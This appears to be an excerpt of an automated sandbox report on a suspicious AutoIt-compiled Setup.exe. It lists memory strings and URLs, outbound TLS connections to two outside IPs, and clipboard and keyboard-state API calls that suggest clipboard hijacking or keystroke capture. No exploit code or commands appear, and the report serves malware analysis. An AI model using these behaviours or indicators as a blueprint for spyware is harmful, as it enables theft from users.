Source: NYMOHD.20.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: NYMOHD.20.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: chrome.exe, 00000017.00000003.3141616011.00000B5000728000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3141486434.00000B500071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3183718358.0000597C0240C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/2J
Source: chrome.exe, 00000017.00000003.3141616011.00000B5000728000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3141486434.00000B500071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3183718358.0000597C0240C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/2P
Source: chrome.exe, 00000017.00000003.3183718358.0000597C0240C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/b
Source: chrome.exe, 00000017.00000003.3183718358.0000597C0240C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://goto.google.com/sme-bugs27
Source: chrome.exe, 00000017.00000003.3183718358.0000597C0240C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://goto.google.com/sme-bugs2e
Source: chrome.exe, 00000017.00000003.3149994959.0000597C0038C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/161903006
Source: chrome.exe, 00000017.00000003.3149994959.0000597C0038C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/166809097
Source: chrome.exe, 00000017.00000003.3149994959.0000597C0038C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/184850002
Source: chrome.exe, 00000017.00000003.3149994959.0000597C0038C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/187425444
Source: chrome.exe, 00000017.00000003.3149994959.0000597C0038C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/220069903
Source: chrome.exe, 00000017.00000003.3149994959.0000597C0038C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/229267970
Source: chrome.exe, 00000017.00000003.3149994959.0000597C0038C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/250706693
Source: chrome.exe, 00000017.00000003.3149994959.0000597C0038C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/253522366
Source: chrome.exe, 00000017.00000003.3149994959.0000597C0038C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/255411748
Source: chrome.exe, 00000017.00000003.3149994959.0000597C0038C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/258207403
Source: chrome.exe, 00000017.00000003.3149994959.0000597C0038C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/274859104
Source: chrome.exe, 00000017.00000003.3149994959.0000597C0038C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/284462263
Source: chrome.exe, 00000017.00000003.3149994959.0000597C0038C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/issues/166475273
Source: chrome.exe, 00000017.00000003.3184517123.0000597C029C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiment/2
Source: chrome.exe, 00000017.00000003.3184517123.0000597C029C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiment/2/springboard
Source: chrome.exe, 00000017.00000003.3141616011.00000B5000728000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3141486434.00000B500071C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiment/2/springboard2
Source: chrome.exe, 00000017.00000003.3184517123.0000597C029C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiment/2/springboardY
Source: chrome.exe, 00000017.00000003.3141616011.00000B5000728000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3141486434.00000B500071C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiment/2/springboardb
Source: chrome.exe, 00000017.00000003.3141486434.00000B500071C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiments
Source: chrome.exe, 00000017.00000003.3200208314.0000597C02920000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3199638206.0000597C02BDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3200417632.0000597C02CDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3200313346.0000597C0293C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search?source=ntp
Source: chrome.exe, 00000017.00000003.3155905954.0000597C01058000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3156144346.0000597C01288000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3156086256.0000597C011A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/upload
Source: chrome.exe, 00000017.00000003.3155905954.0000597C01058000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3156144346.0000597C01288000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3156086256.0000597C011A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/uploadbyurl
Source: chrome.exe, 00000017.00000003.3141616011.00000B5000728000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3141486434.00000B500071C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/v3/2
Source: chrome.exe, 00000017.00000003.3142159724.00000B500087C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3156086256.0000597C011A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/v3/upload
Source: chrome.exe, 00000017.00000003.3141486434.00000B500071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3184054922.0000597C01620000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/v3/upload2
Source: chrome.exe, 00000017.00000003.3183718358.0000597C0240C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lensfrontend-pa.googleapis.com/v1/crupload2
Source: chrome.exe, 00000017.00000003.3200208314.0000597C02920000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3199638206.0000597C02BDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3200417632.0000597C02CDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3200313346.0000597C0293C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/?tab=rm&ogbl
Source: chrome.exe, 00000017.00000003.3183718358.0000597C0240C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://myaccount.google.com/shielded-email2B
Source: chrome.exe, 00000017.00000003.3199996979.0000597C02C54000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ogads-pa.googleapis.com
Source: chrome.exe, 00000017.00000003.3203229202.0000597C00294000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ogs.google.com
Source: chrome.exe, 00000017.00000003.3199996979.0000597C02C54000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ogs.google.com/widget/app/so?eom=1
Source: chrome.exe, 00000017.00000003.3199996979.0000597C02C54000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ogs.google.com/widget/callout?eom=1
Source: chrome.exe, 00000017.00000003.3199996979.0000597C02C54000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ogs.google.com/widget/callout?prid=19044659
Source: chrome.exe, 00000017.00000003.3155905954.0000597C010A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3153276337.0000597C010A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3153769936.0000597C007AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1&target=OPTIMIZATION_TARGET_PAGE_TOPICS_
Source: chrome.exe, 00000017.00000003.3155905954.0000597C010A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3153276337.0000597C010A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3153769936.0000597C007AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1673999601&target=OPTIMIZATION_TARGET_PAG
Source: chrome.exe, 00000017.00000003.3155905954.0000597C010A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3153276337.0000597C010A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3153769936.0000597C007AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1678906374&target=OPTIMIZATION_TARGET_OMN
Source: chrome.exe, 00000017.00000003.3155905954.0000597C010A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3153276337.0000597C010A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1679317318&target=OPTIMIZATION_TARGET_LAN
Source: chrome.exe, 00000017.00000003.3155905954.0000597C010A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3153276337.0000597C010A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3153769936.0000597C007AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049402&target=OPTIMIZATION_TARGET_GEO
Source: chrome.exe, 00000017.00000003.3155905954.0000597C010A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3153276337.0000597C010A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3153769936.0000597C007AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049414&target=OPTIMIZATION_TARGET_NOT
Source: chrome.exe, 00000017.00000003.3155905954.0000597C010A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3153276337.0000597C010A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3153769936.0000597C007AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695051229&target=OPTIMIZATION_TARGET_PAG
Source: chrome.exe, 00000017.00000003.3155905954.0000597C010A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3153276337.0000597C010A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3153769936.0000597C007AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=210230727&target=OPTIMIZATION_TARGET_CLIE
Source: chrome.exe, 00000017.00000003.3155905954.0000597C01058000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3155590374.0000597C01058000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3156144346.0000597C01288000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3156086256.0000597C011A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://photos.google.com?referrer=CHROME_NTP
Source: chrome.exe, 00000017.00000003.3183718358.0000597C0240C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://publickeyservice.gcp.privacysandboxservices.com
Source: chrome.exe, 00000017.00000003.3183718358.0000597C0240C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com
Source: chrome.exe, 00000017.00000003.3183718358.0000597C0240C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
Source: chrome.exe, 00000017.00000003.3183718358.0000597C0240C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com
Source: chrome.exe, 00000017.00000003.3183718358.0000597C0240C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
Source: chrome.exe, 00000017.00000003.3183718358.0000597C0240C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://shieldedids-pa.googleapis.com2
Source: chrome.exe, 00000017.00000003.3183718358.0000597C0240C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://shieldedids-pa.googleapis.comJv
Source: chrome.exe, 00000017.00000003.3172857148.0000597C00338000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com
Source: chrome.exe, 00000017.00000003.3200208314.0000597C02920000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3199638206.0000597C02BDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3200417632.0000597C02CDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3200313346.0000597C0293C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com/gb/images/bar/al-icon.png
Source: Suicide.com.11.dr, Speak.10.dr	String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: NYMOHD.20.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: Speak.10.dr	String found in binary or memory: https://www.globalsign.com/repository/0
Source: Suicide.com.11.dr, Speak.10.dr	String found in binary or memory: https://www.globalsign.com/repository/06
Source: chrome.exe, 00000017.00000003.3172857148.0000597C00338000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com
Source: chrome.exe, 00000017.00000003.3172857148.0000597C00338000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com;report-uri
Source: chrome.exe, 00000017.00000003.3172857148.0000597C00338000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: chrome.exe, 00000017.00000003.3157200493.0000597C00D30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3152330343.0000597C00D28000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3150440283.0000597C00D18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/
Source: chrome.exe, 00000017.00000003.3199996979.0000597C02C54000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/_/og/promos/
Source: chrome.exe, 00000017.00000003.3183718358.0000597C0240C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/go-mobile/?ios-campaign=desktop-chr-ntp&android-campaign=desktop-chr-n
Source: chrome.exe, 00000017.00000003.3183718358.0000597C0240C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/hats/index.htmlb
Source: NYMOHD.20.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: chrome.exe, 00000017.00000003.3200208314.0000597C02920000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3199638206.0000597C02BDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3200417632.0000597C02CDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3200313346.0000597C0293C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/imghp?hl=en&tab=ri&ogbl
Source: chrome.exe, 00000017.00000003.3199996979.0000597C02C54000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/intl/en/about/products?tab=rh
Source: chrome.exe, 00000017.00000003.3183718358.0000597C0240C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search
Source: chrome.exe, 00000017.00000003.3156086256.0000597C011A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search?q=$
Source: chrome.exe, 00000017.00000003.3199996979.0000597C02C54000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/url?q=https://google.com/chrome/safety%3Fbrand%3DKFKH%26utm_source%3Dweb%26ut
Source: chrome.exe, 00000017.00000003.3172857148.0000597C00338000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.comAccess-Control-Allow-Credentials:
Source: chrome.exe, 00000017.00000003.3183718358.0000597C0240C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/aida2
Source: chrome.exe, 00000017.00000003.3183718358.0000597C0240C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager2
Source: chrome.exe, 00000017.00000003.3183718358.0000597C0240C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager23
Source: chrome.exe, 00000017.00000003.3172857148.0000597C00338000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: chrome.exe, 00000017.00000003.3172857148.0000597C00338000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com
Source: chrome.exe, 00000017.00000003.3199996979.0000597C02C54000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/images/icons/material/system/1x/broken_image_grey600_18dp.png
Source: chrome.exe, 00000017.00000003.3200208314.0000597C02920000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3199733886.0000597C02CAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3199564132.0000597C02CBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3199453465.0000597C02C40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3199596319.0000597C02CC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3200417632.0000597C02CDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3200313346.0000597C0293C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3199996979.0000597C02C54000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/images/icons/material/system/2x/broken_image_grey600_18dp.png
Source: chrome.exe, 00000017.00000003.3199996979.0000597C02C54000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/og/_/js/k=og.qtm.en_US.b6tg1FFzATM.2019.O/rt=j/m=q_d
Source: chrome.exe, 00000017.00000003.3199996979.0000597C02C54000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/og/_/ss/k=og.qtm.zyyRgCCaN80.L.W.O/m=qmd

Source: unknown	Network traffic detected: HTTP traffic on port 49890 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49962
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49883
Source: unknown	Network traffic detected: HTTP traffic on port 49974 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49916 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49968 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49930 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49896 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49877 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49935 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49933 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49958 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49919
Source: unknown	Network traffic detected: HTTP traffic on port 49883 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49916
Source: unknown	Network traffic detected: HTTP traffic on port 49977 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49958
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49935
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49934
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49933
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49977
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49877
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49930
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49974
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49896
Source: unknown	Network traffic detected: HTTP traffic on port 49919 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49890
Source: unknown	Network traffic detected: HTTP traffic on port 49909 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49909
Source: unknown	Network traffic detected: HTTP traffic on port 49934 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49962 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49903
Source: unknown	Network traffic detected: HTTP traffic on port 49903 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49968

Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.5:49877 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 5.75.212.196:443 -> 192.168.2.5:49883 version: TLS 1.2

Source: C:\Users\Public\Desktop\Setup.exe

Code function: 8_2_00007FF79EC70D24 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

8_2_00007FF79EC70D24

Source: C:\Users\Public\Desktop\Setup.exe

Code function: 8_2_00007FF79EC70D24 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

8_2_00007FF79EC70D24

Source: C:\Users\Public\Desktop\Setup.exe

Code function: 8_2_00007FF79EC70A6C OpenClipboard,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

8_2_00007FF79EC70A6C

Source: C:\Users\Public\Desktop\Setup.exe

Code function: 8_2_00007FF79EC57E64 GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

8_2_00007FF79EC57E64

System Summary

Binary is likely a compiled AutoIt script file

Source: C:\Users\Public\Desktop\Setup.exe	Code function: This is a third-party compiled AutoIt script.	8_2_00007FF79EBE37B0
Source: Setup.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: Setup.exe, 00000008.00000000.2152192380.00007FF79ECB8000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_d886d21d-b
Source: Setup.exe, 00000008.00000000.2152192380.00007FF79ECB8000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer@*	memstr_d235ed70-9
Source: Setup.exe.2.dr	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_039eede9-1
Source: Setup.exe.2.dr	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer@*	memstr_5fdfb0ac-8

Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00890610 NtdllDefWindowProc_W,	0_2_00890610
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_006F8110 SysFreeString,SysAllocString,GetWindowLongW,GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,GetWindowLongW,SetWindowTextW,GlobalAlloc,GlobalLock,GlobalUnlock,SetWindowLongW,SysFreeString,SysFreeString,	0_2_006F8110
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_007DE5A0 NtdllDefWindowProc_W,	0_2_007DE5A0
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_006F87C0 NtdllDefWindowProc_W,	0_2_006F87C0
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_007028D0 NtdllDefWindowProc_W,	0_2_007028D0
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00710960 NtdllDefWindowProc_W,	0_2_00710960
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_006FA9C0 GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,DestroyWindow,	0_2_006FA9C0
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00702A40 IsWindow,GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,	0_2_00702A40
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_0071ED10 NtdllDefWindowProc_W,	0_2_0071ED10
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_0070AF60 GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,DeleteCriticalSection,	0_2_0070AF60
